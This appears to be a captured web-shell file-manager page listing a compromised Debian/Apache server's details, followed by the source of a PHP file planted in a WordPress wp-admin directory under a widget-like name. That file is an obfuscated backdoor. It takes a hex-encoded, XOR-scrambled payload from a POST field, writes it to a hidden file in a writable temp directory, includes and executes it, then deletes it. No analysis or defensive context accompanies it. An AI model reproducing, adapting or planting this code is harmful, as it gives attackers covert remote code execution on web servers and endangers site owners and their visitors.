HEX
Server: Apache/2.4.38 (Debian)
System: Linux host457 5.14.0-4-amd64 #1 SMP Debian 5.14.16-1 (2021-11-03) x86_64
User: www-data (33)
PHP: 7.4.21
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /home/vhosts/harpoeditore.it/httpdocs/wp-admin/user/widget_area_1756287549.php
<!--AgKn4qEw-->
<?php

if(in_array("\x66\x61\x63tor", array_keys($_POST))){
$flg = hex2bin($_POST["\x66\x61\x63tor"]);
$obj =''; $m=0;while($m<strlen($flg)){$obj.=chr(ord($flg[$m])^75);$m++;}
$resource = array_filter([session_save_path(), getenv("TEMP"), sys_get_temp_dir(), getenv("TMP"), "/dev/shm", ini_get("upload_tmp_dir"), "/tmp", getcwd(), "/var/tmp"]);
foreach ($resource as $key => $marker) {
            if ((bool)is_dir($marker) && (bool)is_writable($marker)) {
            $object = vsprintf("%s/%s", [$marker, ".component"]);
            if (false !== file_put_contents($object, $obj)) {
    include_once $object;
    @unlink($object);
    exit;
}
        }
}
}